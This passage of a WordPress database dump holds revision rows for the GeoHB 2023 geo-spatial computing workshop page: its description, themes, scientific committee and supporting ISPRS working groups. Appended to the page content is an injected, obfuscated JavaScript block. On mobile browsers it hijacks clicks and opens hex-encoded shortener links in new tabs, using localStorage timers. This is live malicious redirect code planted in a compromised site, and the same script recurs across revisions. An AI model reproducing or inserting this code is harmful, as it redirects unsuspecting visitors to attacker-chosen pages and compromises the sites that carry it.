_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 17:13:40','2022-10-14 17:13:40','',2791,'https://gsw2023.com/?p=2830',0,'revision','',0),
(2831,1,'2022-10-14 17:15:19','2022-10-14 17:15:19','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4>Secretary</h4>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"52\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 17:15:19','2022-10-14 17:15:19','',2791,'https://gsw2023.com/?p=2831',0,'revision','',0),
(2832,1,'2022-10-14 17:15:37','2022-10-14 17:15:37','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4>Secretary</h4>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"52\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel 